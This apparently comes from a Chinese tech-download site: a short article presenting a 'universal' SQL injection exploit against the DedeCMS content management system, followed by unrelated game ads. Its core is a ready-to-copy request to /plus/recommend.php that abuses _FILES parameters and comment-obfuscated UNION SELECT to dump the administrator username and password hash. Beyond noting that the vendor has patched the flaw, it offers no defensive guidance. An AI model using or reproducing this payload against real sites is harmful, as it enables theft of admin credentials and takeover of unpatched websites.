最新DedeCMS通杀SQL注入漏洞利用代码整理
作者:袖梨
2022-06-25
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
| 代码如下 | 复制代码 |
|
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@`%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 |
|
相关文章
精彩推荐
-
下载水物理模拟器手机版 安卓版v1.3.39
模拟经营 水物理模拟器手机版 安卓版v1.3.39水物理模拟器是一款玩法非常多样的沙盒建造类手游,玩家可以在游
-
下载
创造世界2 安卓版v2.1.0
模拟经营 创造世界2 安卓版v2.1.0创造世界2是一款非常有趣的模拟类游戏,玩家在游戏中可以控制自
-
下载
时光杂货店0.1折 安卓版v1.9.1
模拟经营 时光杂货店0.1折 安卓版v1.9.1时光杂货店折扣版是一款模拟经营类游戏,玩家们将在游戏中重回八
-
下载
TRS12火车模拟器(内置模组) 安卓版v1.3.9
模拟经营 TRS12火车模拟器(内置模组) 安卓版v1.3.9TRS12火车模拟器(内置模组)是一个非常有趣的火车模拟游戏
-
下载
泽塔奥特曼升华器模拟器 最新版v2.3
模拟经营 泽塔奥特曼升华器模拟器 最新版v2.3泽塔奥特曼升华器模拟器是根据《泽塔奥特曼》电视剧出现的变身器
